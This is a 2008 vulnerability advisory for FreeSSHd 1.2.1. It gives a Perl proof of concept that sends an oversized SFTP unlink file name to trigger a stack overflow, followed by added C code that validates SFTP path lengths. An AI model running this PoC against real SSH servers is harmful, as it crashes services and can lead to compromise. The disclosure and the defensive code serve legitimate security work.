Exploits FreeSSHd Multiple Remote Stack Overflow Vulnerabilities
Source: www.bmgsec.com.au  Author: r0ut3r  Published: 2008-12-24

# FreeSSHd Multiple Remote Stack Overflow Vulnerabilities.
#
# Version : 1.2.1
# Advisory: http://www.bmgsec.com.au/advisory/42/
#
# Discovered & written by:
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
#
# After Jeremy Brown reported similar buffer overflow vulnerabilities in
# FreeSSHd I forgot about it, and stopped my research on the vulnerabilities.
# Anyway just now I noticed that other vulnerable functions had not been
# reported. So below is a small list, and a small proof of concept.
#
# Note: All below functions overwrite EDI register.
# open (edi)
# unlink (edi)
# mkdir (edi)
# rmdir (edi)
# stat (edi)

use strict;
use warnings;
use Net::SSH2;

my $user = "root";
my $pass = "yahh";

my $ip = "127.0.0.1";
my $port = 22;

my $ssh2 = Net::SSH2->new();

print "[+] Connecting...\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
# Authentication must succeed before the SFTP request can be sent.
$ssh2->auth_password($user, $pass) || die "[-] Incorrect credentials\n";

# Oversized file name passed to the SFTP unlink request.
my $payload = "A" x 5000;
print "[+] Sending payload\n";

my $sftp = $ssh2->sftp() || die "[-] Unable to open SFTP channel\n";
$sftp->unlink($payload);

print "[+] Sent\n";
$ssh2->disconnect;
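
The missing control behind this class of bug is a length check on the SFTP path string before it is copied into a fixed-size buffer. The following is an added example, not FreeSSHd code and not part of the original advisory: a bounded path extractor for the request types listed above (open, unlink/remove, mkdir, rmdir, stat, using the SFTP v3 type numbers). The function names, return codes and the 260-byte buffer size are assumptions made for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SFTP_MAX_PATH 260 /* assumed size of the server's path buffer */

enum { FXP_OPEN = 3, FXP_REMOVE = 13, FXP_MKDIR = 14, FXP_RMDIR = 15, FXP_STAT = 17 };
enum { PATH_OK = 0, PATH_TRUNCATED = -1, PATH_TOO_LONG = -2, PATH_BAD_TYPE = -3, PATH_HAS_NUL = -4 };

static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* pkt: SFTP payload from the type byte on: type(1) id(4) pathlen(4) path [other fields]. */
int sftp_extract_path(const uint8_t *pkt, size_t len, char out[SFTP_MAX_PATH]) {
    if (len < 9) return PATH_TRUNCATED;
    switch (pkt[0]) {
    case FXP_OPEN: case FXP_REMOVE: case FXP_MKDIR: case FXP_RMDIR: case FXP_STAT: break;
    default: return PATH_BAD_TYPE;
    }
    uint32_t plen = be32(pkt + 5);
    if (plen > len - 9) return PATH_TRUNCATED;       /* claims more bytes than arrived */
    if (plen >= SFTP_MAX_PATH) return PATH_TOO_LONG; /* checked before any copy */
    if (memchr(pkt + 9, 0, plen)) return PATH_HAS_NUL;
    memcpy(out, pkt + 9, plen);
    out[plen] = '\0';
    return PATH_OK;
}

/* Constructed test input: a request of the given type whose path is `fill` repeated n times. */
size_t build_request(uint8_t *buf, uint8_t type, char fill, uint32_t n) {
    buf[0] = type;
    memset(buf + 1, 0, 4); /* request id 0 */
    buf[5] = (uint8_t)(n >> 24); buf[6] = (uint8_t)(n >> 16);
    buf[7] = (uint8_t)(n >> 8);  buf[8] = (uint8_t)n;
    memset(buf + 9, fill, n);
    return 9 + (size_t)n;
}

int main(void) {
    static uint8_t pkt[9 + 5000];
    char path[SFTP_MAX_PATH];
    size_t len = build_request(pkt, FXP_REMOVE, 'A', 5000); /* name length used by the PoC */
    printf("5000-byte name: %d\n", sftp_extract_path(pkt, len, path));
    len = build_request(pkt, FXP_STAT, 'a', 12);
    printf("12-byte name:   %d (%s)\n", sftp_extract_path(pkt, len, path), path);
    return 0;
}
```

A request rejected with PATH_TOO_LONG is also worth logging with the source address and account name, since legitimate clients do not send file names of that size.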


 